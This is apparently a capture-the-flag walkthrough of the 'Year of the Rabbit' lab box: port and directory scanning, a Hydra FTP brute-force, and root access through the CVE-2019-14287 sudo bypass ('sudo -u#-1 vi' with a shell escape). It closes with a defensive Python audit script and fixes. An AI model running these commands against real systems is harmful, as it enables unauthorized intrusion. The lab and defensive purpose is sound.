Nmap

First, we scan for open ports.

# nmap -p- -T4 -sV -sC 10.10.237.58 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 21:56 BST
Nmap scan report for 10.10.237.58
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Website

The website appears to be the normal Apache holding page, so let's start with a gobuster scan.

# gobuster dir -u http://10.10.237.58 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.237.58
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/assets               (Status: 301) [Size: 313] [--> http://10.10.237.58/assets/]
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 7853]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

The unusual thing here is the assets directory. Normally the holding page is self-contained. Looking closer at the source of the site, we see that it loads an external stylesheet, and that stylesheet has a hidden comment in it.

When visiting the page we get a JavaScript popup message and are then redirected to YouTube and rickrolled. Checking the network tab, we can see that an intermediary page is being called too.

Whilst the intermediary page is just part of the redirect, it carried an additional parameter indicating a hidden directory. Visiting that directory, we find it exists and contains the infamous Lenna image, named Hot_babe.png.

Downloading the image and running strings against it reveals some hidden information for FTP.

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
1G8Ucoce1+gS5
0plnI%f0~Jw71
0kLoLzfhqq8u&
kS9pn5yiFGj6d
zeff4#!b5Ib_n
rNT4E4SHDGBkl
...
...
...

FTP

We put all of the passwords from the image into a text file and then use Hydra to make short work of finding the correct one.

# hydra -l ftpuser -P ftp-pass.txt 10.10.237.58 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-02 22:36:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.237.58:21/
[21][ftp] host: 10.10.237.58   login: ftpuser   password: *************
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-02 22:36:59

We can now log in to FTP with these creds, and there is a single file.

# ftp -A ftpuser@10.10.237.58           
Connected to 10.10.237.58.
220 (vsFTPd 3.0.2)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt

Downloading the file and looking inside, we find a message that looks to be written in Brainfuck. Using an online decoder, we can reveal the message.

SSH

Using the discovered creds, we log in as eli and get a message.

# ssh eli@10.10.237.58
eli@10.10.237.58's password: 


1 new message
Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE

So we run a search on the machine for anything named s3cr3t. This reveals another message containing Gwendoline's password.

eli@year-of-the-rabbit:~$ find / -name s3cr3t 2>/dev/null
/usr/games/s3cr3t
eli@year-of-the-rabbit:~$ ls -lah /usr/games/s3cr3t/
total 12K
drwxr-xr-x 2 root root 4.0K Jan 23  2020 .
drwxr-xr-x 3 root root 4.0K Jan 23  2020 ..
-rw-r--r-- 1 root root  138 Jan 23  2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just *************
Honestly!

Yours sincerely
   -Root

With these creds we can switch to Gwendoline's account and get the user flag.

eli@year-of-the-rabbit:~$ su - gwendoline
Password: 
gwendoline@year-of-the-rabbit:~$ ls
user.txt
gwendoline@year-of-the-rabbit:~$ cat user.txt 
THM{11************************************53}

Privilege escalation

Checking the sudo permissions of Gwendoline's account shows that we can launch vi on the user flag file as any user except root, without a password (NOPASSWD).

gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt

However, checking the sudo version reveals it is an older version that is vulnerable to CVE-2019-14287, for which a user ID check bypass is listed on Exploit-DB.

gwendoline@year-of-the-rabbit:~$ sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3

This means we can run vi as root and then, by executing !/bin/sh inside vi, drop into a shell as root and grab the flag.

gwendoline@year-of-the-rabbit:~$ sudo -u#-1 vi /home/gwendoline/user.txt

# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{8d************************************61}
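From the defender's side, the box combines two separately fixable problems: a sudo older than 1.8.28 (CVE-2019-14287) paired with a Runas list of the form (ALL, !root), and a sudo-permitted editor that can spawn a shell. The following Python audit is an added example, not part of the writeup; the SUDO_V and SUDO_L samples are reconstructed from the output above, and the set of shell-escape binaries is an assumption kept deliberately small.

```python
import re

# Constructed sample input, reconstructed from the `sudo -V` and
# `sudo -l` output shown in the walkthrough.
SUDO_V = """Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
"""
SUDO_L = r"""Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""

FIXED_IN = (1, 8, 28)  # CVE-2019-14287 was fixed in sudo 1.8.28
# Editors that can run a shell from inside the program (the box shows
# vi doing exactly that). Assumption: small illustrative set.
SHELL_ESCAPE_BINARIES = {"vi", "vim"}

def parse_sudo_version(text):
    """Return (major, minor, patch) from `sudo -V`; a 'p3' suffix is ignored."""
    m = re.search(r"^Sudo version (\d+)\.(\d+)\.(\d+)", text, re.M)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())

def parse_rules(text):
    """Yield (runas_list, nopasswd, command) for each '(runas) [NOPASSWD:] cmd' line."""
    for m in re.finditer(r"^\s*\(([^)]*)\)\s*(NOPASSWD:)?\s*(.+)$", text, re.M):
        runas = [r.strip() for r in m.group(1).split(",")]
        yield runas, bool(m.group(2)), m.group(3).strip()

def audit(sudo_v, sudo_l):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    findings = []
    version = parse_sudo_version(sudo_v)
    for runas, nopasswd, cmd in parse_rules(sudo_l):
        # The -u#-1 bypass only matters when the Runas list allows ALL
        # but excludes root by name or uid, on a sudo older than 1.8.28.
        negates_root = any(r in ("!root", "!#0") for r in runas)
        if "ALL" in runas and negates_root and version < FIXED_IN:
            findings.append(f"CVE-2019-14287: sudo {version} lets ({', '.join(runas)}) reach root via {cmd}")
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            pw = "NOPASSWD" if nopasswd else "password required"
            findings.append(f"shell escape: {binary} runnable as ({', '.join(runas)}), {pw}")
    return findings
```

Both findings on this box are closed by upgrading sudo and replacing the (ALL, !root) rule with an explicit allow-list of Runas users that does not include an editor.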